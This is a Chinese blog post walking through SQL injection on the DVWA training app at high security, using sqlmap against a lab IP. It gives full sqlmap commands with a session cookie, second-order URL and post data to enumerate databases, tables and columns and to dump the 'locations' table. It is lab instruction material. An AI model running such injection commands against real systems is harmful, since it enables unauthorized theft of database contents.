dvwa-sql注入high级别sqlmap使用(自制任务)

于 2021-05-08 10:15:35 发布
阅读量845 收藏 7
点赞数 1
文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47726676/article/details/116518440
版权

在high安全级别下,我们能够看到进行了一次页面跳转
在这里插入图片描述
使用cookie插件获取cookie信息
在这里插入图片描述

--cookie="4a80203698ca9007ed3373a065349ddd;security=high"

此时用户提交网站为10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php

-u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php"

实际要注入的网站为http://10.12.202.4/dvwa/vulnerabilities/sqli/

--second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/"

用户提交的数据为

--data="id=1&Submit=Submit"

构造完成,尝试列出所有数据库(–batch全自动,不会要求输入y/n)

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" --dbs --batch

在这里插入图片描述
查看目前数据库

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –current-db --batch

查看当前数据库下所有表名

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –tables -D "dvwa" --batch

在这里插入图片描述
发现locations
列出此表所有字段

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –columns -T "locations" -D "dvwa" --batch

在这里插入图片描述

获得维度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "latitude" --batch

在这里插入图片描述
获得经度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "longtitude" --batch

在这里插入图片描述
获得建筑名称

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "name" --batch

在这里插入图片描述

JeremyHeria
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值